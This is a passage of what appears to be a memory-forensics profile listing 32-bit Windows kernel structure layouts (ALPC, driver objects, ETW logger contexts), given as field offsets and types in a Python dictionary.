'RegionListHead' : [ 0x20, ['_LIST_ENTRY']],
} ],
'__unnamed_199a' : [ 0x4, {
'Secure' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
} ],
'__unnamed_199c' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_199a']],
} ],
'_KALPC_REGION' : [ 0x30, {
'RegionListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Section' : [ 0x8, ['pointer', ['_KALPC_SECTION']]],
'Offset' : [ 0xc, ['unsigned long']],
'Size' : [ 0x10, ['unsigned long']],
'ViewSize' : [ 0x14, ['unsigned long']],
'u1' : [ 0x18, ['__unnamed_199c']],
'NumberOfViews' : [ 0x1c, ['unsigned long']],
'ViewListHead' : [ 0x20, ['_LIST_ENTRY']],
'ReadOnlyView' : [ 0x28, ['pointer', ['_KALPC_VIEW']]],
'ReadWriteView' : [ 0x2c, ['pointer', ['_KALPC_VIEW']]],
} ],
'__unnamed_19a2' : [ 0x4, {
'WriteAccess' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'AutoRelease' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ForceUnlink' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
} ],
'__unnamed_19a4' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_19a2']],
} ],
'_KALPC_VIEW' : [ 0x34, {
'ViewListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Region' : [ 0x8, ['pointer', ['_KALPC_REGION']]],
'OwnerPort' : [ 0xc, ['pointer', ['_ALPC_PORT']]],
'OwnerProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
'Address' : [ 0x14, ['pointer', ['void']]],
'Size' : [ 0x18, ['unsigned long']],
'SecureViewHandle' : [ 0x1c, ['pointer', ['void']]],
'WriteAccessHandle' : [ 0x20, ['pointer', ['void']]],
'u1' : [ 0x24, ['__unnamed_19a4']],
'NumberOfOwnerMessages' : [ 0x28, ['unsigned long']],
'ProcessViewListEntry' : [ 0x2c, ['_LIST_ENTRY']],
} ],
'_ALPC_COMMUNICATION_INFO' : [ 0x24, {
'ConnectionPort' : [ 0x0, ['pointer', ['_ALPC_PORT']]],
'ServerCommunicationPort' : [ 0x4, ['pointer', ['_ALPC_PORT']]],
'ClientCommunicationPort' : [ 0x8, ['pointer', ['_ALPC_PORT']]],
'CommunicationList' : [ 0xc, ['_LIST_ENTRY']],
'HandleTable' : [ 0x14, ['_ALPC_HANDLE_TABLE']],
} ],
'__unnamed_19c0' : [ 0x4, {
'Initialized' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Type' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 3, native_type='unsigned long')]],
'ConnectionPending' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ConnectionRefused' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Disconnected' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Closed' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'NoFlushOnClose' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ReturnExtendedInfo' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'Waitable' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'DynamicSecurity' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Wow64CompletionList' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'Lpc' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'LpcToLpc' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'HasCompletionList' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'HadCompletionList' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'EnableCompletionList' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
} ],
'__unnamed_19c2' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_19c0']],
'State' : [ 0x0, ['unsigned long']],
} ],
'_ALPC_PORT' : [ 0xfc, {
'PortListEntry' : [ 0x0, ['_LIST_ENTRY']],
'CommunicationInfo' : [ 0x8, ['pointer', ['_ALPC_COMMUNICATION_INFO']]],
'OwnerProcess' : [ 0xc, ['pointer', ['_EPROCESS']]],
'CompletionPort' : [ 0x10, ['pointer', ['void']]],
'CompletionKey' : [ 0x14, ['pointer', ['void']]],
'CompletionPacketLookaside' : [ 0x18, ['pointer', ['_ALPC_COMPLETION_PACKET_LOOKASIDE']]],
'PortContext' : [ 0x1c, ['pointer', ['void']]],
'StaticSecurity' : [ 0x20, ['_SECURITY_CLIENT_CONTEXT']],
'MainQueue' : [ 0x5c, ['_LIST_ENTRY']],
'PendingQueue' : [ 0x64, ['_LIST_ENTRY']],
'LargeMessageQueue' : [ 0x6c, ['_LIST_ENTRY']],
'WaitQueue' : [ 0x74, ['_LIST_ENTRY']],
'Semaphore' : [ 0x7c, ['pointer', ['_KSEMAPHORE']]],
'DummyEvent' : [ 0x7c, ['pointer', ['_KEVENT']]],
'PortAttributes' : [ 0x80, ['_ALPC_PORT_ATTRIBUTES']],
'Lock' : [ 0xac, ['_EX_PUSH_LOCK']],
'ResourceListLock' : [ 0xb0, ['_EX_PUSH_LOCK']],
'ResourceListHead' : [ 0xb4, ['_LIST_ENTRY']],
'CompletionList' : [ 0xbc, ['pointer', ['_ALPC_COMPLETION_LIST']]],
'MessageZone' : [ 0xc0, ['pointer', ['_ALPC_MESSAGE_ZONE']]],
'CallbackObject' : [ 0xc4, ['pointer', ['_CALLBACK_OBJECT']]],
'CallbackContext' : [ 0xc8, ['pointer', ['void']]],
'CanceledQueue' : [ 0xcc, ['_LIST_ENTRY']],
'SequenceNo' : [ 0xd4, ['long']],
'u1' : [ 0xd8, ['__unnamed_19c2']],
'TargetQueuePort' : [ 0xdc, ['pointer', ['_ALPC_PORT']]],
'TargetSequencePort' : [ 0xe0, ['pointer', ['_ALPC_PORT']]],
'CachedMessage' : [ 0xe4, ['pointer', ['_KALPC_MESSAGE']]],
'MainQueueLength' : [ 0xe8, ['unsigned long']],
'PendingQueueLength' : [ 0xec, ['unsigned long']],
'LargeMessageQueueLength' : [ 0xf0, ['unsigned long']],
'CanceledQueueLength' : [ 0xf4, ['unsigned long']],
'WaitQueueLength' : [ 0xf8, ['unsigned long']],
} ],
'_OBJECT_TYPE' : [ 0x88, {
'TypeList' : [ 0x0, ['_LIST_ENTRY']],
'Name' : [ 0x8, ['_UNICODE_STRING']],
'DefaultObject' : [ 0x10, ['pointer', ['void']]],
'Index' : [ 0x14, ['unsigned char']],
'TotalNumberOfObjects' : [ 0x18, ['unsigned long']],
'TotalNumberOfHandles' : [ 0x1c, ['unsigned long']],
'HighWaterNumberOfObjects' : [ 0x20, ['unsigned long']],
'HighWaterNumberOfHandles' : [ 0x24, ['unsigned long']],
'TypeInfo' : [ 0x28, ['_OBJECT_TYPE_INITIALIZER']],
'TypeLock' : [ 0x78, ['_EX_PUSH_LOCK']],
'Key' : [ 0x7c, ['unsigned long']],
'CallbackList' : [ 0x80, ['_LIST_ENTRY']],
} ],
'__unnamed_19da' : [ 0x4, {
'QueueType' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned long')]],
'QueuePortType' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 6, native_type='unsigned long')]],
'Canceled' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'Ready' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ReleaseMessage' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'SharedQuota' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'ReplyWaitReply' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'OwnerPortReference' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'ReserveReference' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'ReceiverReference' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'ViewAttributeRetrieved' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'InDispatch' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
} ],
'__unnamed_19dc' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_19da']],
'State' : [ 0x0, ['unsigned long']],
} ],
'_KALPC_MESSAGE' : [ 0x88, {
'Entry' : [ 0x0, ['_LIST_ENTRY']],
'ExtensionBuffer' : [ 0x8, ['pointer', ['void']]],
'ExtensionBufferSize' : [ 0xc, ['unsigned long']],
'QuotaProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
'QuotaBlock' : [ 0x10, ['pointer', ['void']]],
'SequenceNo' : [ 0x14, ['long']],
'u1' : [ 0x18, ['__unnamed_19dc']],
'CancelSequencePort' : [ 0x1c, ['pointer', ['_ALPC_PORT']]],
'CancelQueuePort' : [ 0x20, ['pointer', ['_ALPC_PORT']]],
'CancelSequenceNo' : [ 0x24, ['long']],
'CancelListEntry' : [ 0x28, ['_LIST_ENTRY']],
'WaitingThread' : [ 0x30, ['pointer', ['_ETHREAD']]],
'Reserve' : [ 0x34, ['pointer', ['_KALPC_RESERVE']]],
'PortQueue' : [ 0x38, ['pointer', ['_ALPC_PORT']]],
'OwnerPort' : [ 0x3c, ['pointer', ['_ALPC_PORT']]],
'MessageAttributes' : [ 0x40, ['_KALPC_MESSAGE_ATTRIBUTES']],
'DataUserVa' : [ 0x5c, ['pointer', ['void']]],
'DataSystemVa' : [ 0x60, ['pointer', ['void']]],
'CommunicationInfo' : [ 0x64, ['pointer', ['_ALPC_COMMUNICATION_INFO']]],
'ConnectionPort' : [ 0x68, ['pointer', ['_ALPC_PORT']]],
'ServerThread' : [ 0x6c, ['pointer', ['_ETHREAD']]],
'PortMessage' : [ 0x70, ['_PORT_MESSAGE']],
} ],
'_REMOTE_PORT_VIEW' : [ 0xc, {
'Length' : [ 0x0, ['unsigned long']],
'ViewSize' : [ 0x4, ['unsigned long']],
'ViewBase' : [ 0x8, ['pointer', ['void']]],
} ],
'_KALPC_RESERVE' : [ 0x14, {
'OwnerPort' : [ 0x0, ['pointer', ['_ALPC_PORT']]],
'HandleTable' : [ 0x4, ['pointer', ['_ALPC_HANDLE_TABLE']]],
'Handle' : [ 0x8, ['pointer', ['void']]],
'Message' : [ 0xc, ['pointer', ['_KALPC_MESSAGE']]],
'Active' : [ 0x10, ['long']],
} ],
'_KALPC_HANDLE_DATA' : [ 0xc, {
'Flags' : [ 0x0, ['unsigned long']],
'ObjectType' : [ 0x4, ['unsigned long']],
'DuplicateContext' : [ 0x8, ['pointer', ['_OB_DUPLICATE_OBJECT_STATE']]],
} ],
'_KALPC_MESSAGE_ATTRIBUTES' : [ 0x1c, {
'ClientContext' : [ 0x0, ['pointer', ['void']]],
'ServerContext' : [ 0x4, ['pointer', ['void']]],
'PortContext' : [ 0x8, ['pointer', ['void']]],
'CancelPortContext' : [ 0xc, ['pointer', ['void']]],
'SecurityData' : [ 0x10, ['pointer', ['_KALPC_SECURITY_DATA']]],
'View' : [ 0x14, ['pointer', ['_KALPC_VIEW']]],
'HandleData' : [ 0x18, ['pointer', ['_KALPC_HANDLE_DATA']]],
} ],
'__unnamed_1a19' : [ 0x4, {
'Revoked' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Impersonated' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
} ],
'__unnamed_1a1b' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_1a19']],
} ],
'_KALPC_SECURITY_DATA' : [ 0x50, {
'HandleTable' : [ 0x0, ['pointer', ['_ALPC_HANDLE_TABLE']]],
'ContextHandle' : [ 0x4, ['pointer', ['void']]],
'OwningProcess' : [ 0x8, ['pointer', ['_EPROCESS']]],
'OwnerPort' : [ 0xc, ['pointer', ['_ALPC_PORT']]],
'DynamicSecurity' : [ 0x10, ['_SECURITY_CLIENT_CONTEXT']],
'u1' : [ 0x4c, ['__unnamed_1a1b']],
} ],
'_IO_MINI_COMPLETION_PACKET_USER' : [ 0x28, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'PacketType' : [ 0x8, ['unsigned long']],
'KeyContext' : [ 0xc, ['pointer', ['void']]],
'ApcContext' : [ 0x10, ['pointer', ['void']]],
'IoStatus' : [ 0x14, ['long']],
'IoStatusInformation' : [ 0x18, ['unsigned long']],
'MiniPacketCallback' : [ 0x1c, ['pointer', ['void']]],
'Context' : [ 0x20, ['pointer', ['void']]],
'Allocated' : [ 0x24, ['unsigned char']],
} ],
'_ALPC_DISPATCH_CONTEXT' : [ 0x20, {
'PortObject' : [ 0x0, ['pointer', ['_ALPC_PORT']]],
'Message' : [ 0x4, ['pointer', ['_KALPC_MESSAGE']]],
'CommunicationInfo' : [ 0x8, ['pointer', ['_ALPC_COMMUNICATION_INFO']]],
'TargetThread' : [ 0xc, ['pointer', ['_ETHREAD']]],
'TargetPort' : [ 0x10, ['pointer', ['_ALPC_PORT']]],
'Flags' : [ 0x14, ['unsigned long']],
'TotalLength' : [ 0x18, ['unsigned short']],
'Type' : [ 0x1a, ['unsigned short']],
'DataInfoOffset' : [ 0x1c, ['unsigned short']],
} ],
'_DRIVER_OBJECT' : [ 0xa8, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'Flags' : [ 0x8, ['unsigned long']],
'DriverStart' : [ 0xc, ['pointer', ['void']]],
'DriverSize' : [ 0x10, ['unsigned long']],
'DriverSection' : [ 0x14, ['pointer', ['void']]],
'DriverExtension' : [ 0x18, ['pointer', ['_DRIVER_EXTENSION']]],
'DriverName' : [ 0x1c, ['_UNICODE_STRING']],
'HardwareDatabase' : [ 0x24, ['pointer', ['_UNICODE_STRING']]],
'FastIoDispatch' : [ 0x28, ['pointer', ['_FAST_IO_DISPATCH']]],
'DriverInit' : [ 0x2c, ['pointer', ['void']]],
'DriverStartIo' : [ 0x30, ['pointer', ['void']]],
'DriverUnload' : [ 0x34, ['pointer', ['void']]],
'MajorFunction' : [ 0x38, ['array', 28, ['pointer', ['void']]]],
} ],
'_FILE_SEGMENT_ELEMENT' : [ 0x8, {
'Buffer' : [ 0x0, ['pointer64', ['void']]],
'Alignment' : [ 0x0, ['unsigned long long']],
} ],
'_RELATIVE_SYMLINK_INFO' : [ 0x14, {
'ExposedNamespaceLength' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned short']],
'DeviceNameLength' : [ 0x4, ['unsigned short']],
'Reserved' : [ 0x6, ['unsigned short']],
'InteriorMountPoint' : [ 0x8, ['pointer', ['_RELATIVE_SYMLINK_INFO']]],
'OpenedName' : [ 0xc, ['_UNICODE_STRING']],
} ],
'_ECP_LIST' : [ 0x10, {
'Signature' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x4, ['unsigned long']],
'EcpList' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_IOP_FILE_OBJECT_EXTENSION' : [ 0x24, {
'FoExtFlags' : [ 0x0, ['unsigned long']],
'FoExtPerTypeExtension' : [ 0x4, ['array', 7, ['pointer', ['void']]]],
'FoIoPriorityHint' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'IopIoPriorityNotSet', 1: 'IopIoPriorityVeryLow', 2: 'IopIoPriorityLow', 3: 'IopIoPriorityNormal', 4: 'IopIoPriorityHigh', 5: 'IopIoPriorityCritical', 6: 'MaxIopIoPriorityTypes'})]],
} ],
'_OPEN_PACKET' : [ 0x70, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'FileObject' : [ 0x4, ['pointer', ['_FILE_OBJECT']]],
'FinalStatus' : [ 0x8, ['long']],
'Information' : [ 0xc, ['unsigned long']],
'ParseCheck' : [ 0x10, ['unsigned long']],
'RelatedFileObject' : [ 0x14, ['pointer', ['_FILE_OBJECT']]],
'OriginalAttributes' : [ 0x18, ['pointer', ['_OBJECT_ATTRIBUTES']]],
'AllocationSize' : [ 0x20, ['_LARGE_INTEGER']],
'CreateOptions' : [ 0x28, ['unsigned long']],
'FileAttributes' : [ 0x2c, ['unsigned short']],
'ShareAccess' : [ 0x2e, ['unsigned short']],
'EaBuffer' : [ 0x30, ['pointer', ['void']]],
'EaLength' : [ 0x34, ['unsigned long']],
'Options' : [ 0x38, ['unsigned long']],
'Disposition' : [ 0x3c, ['unsigned long']],
'BasicInformation' : [ 0x40, ['pointer', ['_FILE_BASIC_INFORMATION']]],
'NetworkInformation' : [ 0x44, ['pointer', ['_FILE_NETWORK_OPEN_INFORMATION']]],
'CreateFileType' : [ 0x48, ['Enumeration', dict(target = 'long', choices = {0: 'CreateFileTypeNone', 1: 'CreateFileTypeNamedPipe', 2: 'CreateFileTypeMailslot'})]],
'MailslotOrPipeParameters' : [ 0x4c, ['pointer', ['void']]],
'Override' : [ 0x50, ['unsigned char']],
'QueryOnly' : [ 0x51, ['unsigned char']],
'DeleteOnly' : [ 0x52, ['unsigned char']],
'FullAttributes' : [ 0x53, ['unsigned char']],
'LocalFileObject' : [ 0x54, ['pointer', ['_DUMMY_FILE_OBJECT']]],
'InternalFlags' : [ 0x58, ['unsigned long']],
'DriverCreateContext' : [ 0x5c, ['_IO_DRIVER_CREATE_CONTEXT']],
} ],
'_ETW_SYSTEMTIME' : [ 0x10, {
'Year' : [ 0x0, ['unsigned short']],
'Month' : [ 0x2, ['unsigned short']],
'DayOfWeek' : [ 0x4, ['unsigned short']],
'Day' : [ 0x6, ['unsigned short']],
'Hour' : [ 0x8, ['unsigned short']],
'Minute' : [ 0xa, ['unsigned short']],
'Second' : [ 0xc, ['unsigned short']],
'Milliseconds' : [ 0xe, ['unsigned short']],
} ],
'_TIME_FIELDS' : [ 0x10, {
'Year' : [ 0x0, ['short']],
'Month' : [ 0x2, ['short']],
'Day' : [ 0x4, ['short']],
'Hour' : [ 0x6, ['short']],
'Minute' : [ 0x8, ['short']],
'Second' : [ 0xa, ['short']],
'Milliseconds' : [ 0xc, ['short']],
'Weekday' : [ 0xe, ['short']],
} ],
'_WMI_LOGGER_CONTEXT' : [ 0x238, {
'LoggerId' : [ 0x0, ['unsigned long']],
'BufferSize' : [ 0x4, ['unsigned long']],
'MaximumEventSize' : [ 0x8, ['unsigned long']],
'CollectionOn' : [ 0xc, ['long']],
'LoggerMode' : [ 0x10, ['unsigned long']],
'AcceptNewEvents' : [ 0x14, ['long']],
'GetCpuClock' : [ 0x18, ['pointer', ['void']]],
'StartTime' : [ 0x20, ['_LARGE_INTEGER']],
'LogFileHandle' : [ 0x28, ['pointer', ['void']]],
'LoggerThread' : [ 0x2c, ['pointer', ['_ETHREAD']]],
'LoggerStatus' : [ 0x30, ['long']],
'NBQHead' : [ 0x34, ['pointer', ['void']]],
'OverflowNBQHead' : [ 0x38, ['pointer', ['void']]],
'QueueBlockFreeList' : [ 0x40, ['_SLIST_HEADER']],
'GlobalList' : [ 0x48, ['_LIST_ENTRY']],
'BatchedBufferList' : [ 0x50, ['pointer', ['_WMI_BUFFER_HEADER']]],
'CurrentBuffer' : [ 0x50, ['_EX_FAST_REF']],
'LoggerName' : [ 0x54, ['_UNICODE_STRING']],
'LogFileName' : [ 0x5c, ['_UNICODE_STRING']],
'LogFilePattern' : [ 0x64, ['_UNICODE_STRING']],
'NewLogFileName' : [ 0x6c, ['_UNICODE_STRING']],
'ClockType' : [ 0x74, ['unsigned long']],
'MaximumFileSize' : [ 0x78, ['unsigned long']],
'LastFlushedBuffer' : [ 0x7c, ['unsigned long']],
'FlushTimer' : [ 0x80, ['unsigned long']],
'FlushThreshold' : [ 0x84, ['unsigned long']],
'ByteOffset' : [ 0x88, ['_LARGE_INTEGER']],
'MinimumBuffers' : [ 0x90, ['unsigned long']],
'BuffersAvailable' : [ 0x94, ['long']],
'NumberOfBuffers' : [ 0x98, ['long']],
'MaximumBuffers' : [ 0x9c, ['unsigned long']],
'EventsLost' : [ 0xa0, ['unsigned long']],
'BuffersWritten' : [ 0xa4, ['unsigned long']],
'LogBuffersLost' : [ 0xa8, ['unsigned long']],
'RealTimeBuffersDelivered' : [ 0xac, ['unsigned long']],
'RealTimeBuffersLost' : [ 0xb0, ['unsigned long']],
'SequencePtr' : [ 0xb4, ['pointer', ['long']]],
'LocalSequence' : [ 0xb8, ['unsigned long']],
'InstanceGuid' : [ 0xbc, ['_GUID']],
'FileCounter' : [ 0xcc, ['long']],
'BufferCallback' : [ 0xd0, ['pointer', ['void']]],
'PoolType' : [ 0xd4, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'ReferenceTime' : [ 0xd8, ['_ETW_REF_CLOCK']],
'Consumers' : [ 0xe8, ['_LIST_ENTRY']],
'NumConsumers' : [ 0xf0, ['unsigned long']],
'TransitionConsumer' : [ 0xf4, ['pointer', ['_ETW_REALTIME_CONSUMER']]],
'RealtimeLogfileHandle' : [ 0xf8, ['pointer', ['void']]],
'RealtimeLogfileName' : [ 0xfc, ['_UNICODE_STRING']],
'RealtimeWriteOffset' : [ 0x108, ['_LARGE_INTEGER']],
'RealtimeReadOffset' : [ 0x110, ['_LARGE_INTEGER']],
'RealtimeLogfileSize' : [ 0x118, ['_LARGE_INTEGER']],
'RealtimeLogfileUsage' : [ 0x120, ['unsigned long long']],
'RealtimeMaximumFileSize' : [ 0x128, ['unsigned long long']],
'RealtimeBuffersSaved' : [ 0x130, ['unsigned long']],
'RealtimeReferenceTime' : [ 0x138, ['_ETW_REF_CLOCK']],
'NewRTEventsLost' : [ 0x148, ['Enumeration', dict(target = 'long', choices = {0: 'EtwRtEventNoLoss', 1: 'EtwRtEventLost', 2: 'EtwRtBufferLost', 3: 'EtwRtBackupLost', 4: 'EtwRtEventLossMax'})]],
'LoggerEvent' : [ 0x14c, ['_KEVENT']],
'FlushEvent' : [ 0x15c, ['_KEVENT']],
'FlushTimeOutTimer' : [ 0x170, ['_KTIMER']],
'FlushDpc' : [ 0x198, ['_KDPC']],
'LoggerMutex' : [ 0x1b8, ['_KMUTANT']],
'LoggerLock' : [ 0x1d8, ['_EX_PUSH_LOCK']],
'BufferListSpinLock' : [ 0x1dc, ['unsigned long']],
'BufferListPushLock' : [ 0x1dc, ['_EX_PUSH_LOCK']],
'ClientSecurityContext' : [ 0x1e0, ['_SECURITY_CLIENT_CONTEXT']],
'SecurityDescriptor' : [ 0x21c, ['_EX_FAST_REF']],
'BufferSequenceNumber' : [ 0x220, ['long long']],
'Flags' : [ 0x228, ['unsigned long']],
'Persistent' : [ 0x228, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'AutoLogger' : [ 0x228, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'FsReady' : [ 0x228, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'RealTime' : [ 0x228, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Wow' : [ 0x228, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'KernelTrace' : [ 0x228, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'NoMoreEnable' : [ 0x228, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'StackTracing' : [ 0x228, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ErrorLogged' : [ 0x228, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'RealtimeLoggerContextFreed' : [ 0x228, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'RequestFlag' : [ 0x22c, ['unsigned long']],
'RequestNewFie' : [ 0x22c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'RequestUpdateFile' : [ 0x22c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'RequestFlush' : [ 0x22c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'RequestDisableRealtime' : [ 0x22c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'RequestDisconnectConsumer' : [ 0x22c, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'RequestConnectConsumer' : [ 0x22c, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'HookIdMap' : [ 0x230, ['_RTL_BITMAP']],
} ],
'_ETW_LOGGER_HANDLE' : [ 0x1, {
'DereferenceAndLeave' : [ 0x0, ['unsigned char']],
} ],
'_ETW_BUFFER_HANDLE' : [ 0x8, {
'TraceBuffer' : [ 0x0, ['pointer', ['_WMI_BUFFER_HEADER']]],
'BufferFastRef' : [ 0x4, ['pointer', ['_EX_FAST_REF']]],
} ],
'_SYSTEM_TRACE_HEADER' : [ 0x20, {
'Marker' : [ 0x0, ['unsigned long']],
'Version' : [ 0x0, ['unsigned short']],
'HeaderType' : [ 0x2, ['unsigned char']],
'Flags' : [ 0x3, ['unsigned char']],
'Header' : [ 0x4, ['unsigned long']],
'Packet' : [ 0x4, ['_WMI_TRACE_PACKET']],
'ThreadId' : [ 0x8, ['unsigned long']],
'ProcessId' : [ 0xc, ['unsigned long']],
'SystemTime' : [ 0x10, ['_LARGE_INTEGER']],
'KernelTime' : [ 0x18, ['unsigned long']],
'UserTime' : [ 0x1c, ['unsigned long']],
} ],
'_PERFINFO_TRACE_HEADER' : [ 0x18, {
'Marker' : [ 0x0, ['unsigned long']],
'Version' : [ 0x0, ['unsigned short']],
'HeaderType' : [ 0x2, ['unsigned char']],
'Flags' : [ 0x3, ['unsigned char']],
'Header' : [ 0x4, ['unsigned long']],
'Packet' : [ 0x4, ['_WMI_TRACE_PACKET']],
'TS' : [ 0x8, ['unsigned long long']],
'SystemTime' : [ 0x8, ['_LARGE_INTEGER']],
'Data' : [ 0x10, ['array', 1, ['unsigned char']]],
} ],
'_NBQUEUE_BLOCK' : [ 0x18, {
'SListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Next' : [ 0x8, ['unsigned long long']],
'Data' : [ 0x10, ['unsigned long long']],
} ],
'_KMUTANT' : [ 0x20, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'MutantListEntry' : [ 0x10, ['_LIST_ENTRY']],
'OwnerThread' : [ 0x18, ['pointer', ['_KTHREAD']]],
'Abandoned' : [ 0x1c, ['unsigned char']],
'ApcDisable' : [ 0x1d, ['unsigned char']],
} ],
'_ETW_LAST_ENABLE_INFO' : [ 0x10, {
'EnableFlags' : [ 0x0, ['_LARGE_INTEGER']],
'LoggerId' : [ 0x8, ['unsigned short']],
'Level' : [ 0xa, ['unsigned char']],
'Enabled' : [ 0xb, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'InternalFlag' : [ 0xb, ['BitField', dict(start_bit = 1, end_bit = 8, native_type='unsigned char')]],
} ],
'_TRACE_ENABLE_CONTEXT' : [ 0x8, {
'LoggerId' : [ 0x0, ['unsigned short']],
'Level' : [ 0x2, ['unsigned char']],
'InternalFlag' : [ 0x3, ['unsigned char']],
'EnableFlags' : [ 0x4, ['unsigned long']],
} ],
'_TRACE_ENABLE_CONTEXT_EX' : [ 0x10, {
'LoggerId' : [ 0x0, ['unsigned short']],
'Level' : [ 0x2, ['unsigned char']],
'InternalFlag' : [ 0x3, ['unsigned char']],
'EnableFlags' : [ 0x4, ['unsigned long']],
'EnableFlagsHigh' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'_ETW_GUID_ENTRY' : [ 0x178, {
'GuidList' : [ 0x0, ['_LIST_ENTRY']],
'RefCount' : [ 0x8, ['long']],
'Guid' : [ 0xc, ['_GUID']],
'RegListHead' : [ 0x1c, ['_LIST_ENTRY']],
'SecurityDescriptor' : [ 0x24, ['pointer', ['void']]],
'LastEnable' : [ 0x28, ['_ETW_LAST_ENABLE_INFO']],
'MatchId' : [ 0x28, ['unsigned long long']],
'ProviderEnableInfo' : [ 0x38, ['_TRACE_ENABLE_INFO']],
'EnableInfo' : [ 0x58, ['array', 8, ['_TRACE_ENABLE_INFO']]],
'FilterData' : [ 0x158, ['array', 8, ['pointer', ['_EVENT_FILTER_HEADER']]]],
} ],
'_TRACE_ENABLE_INFO' : [ 0x20, {
'IsEnabled' : [ 0x0, ['unsigned long']],
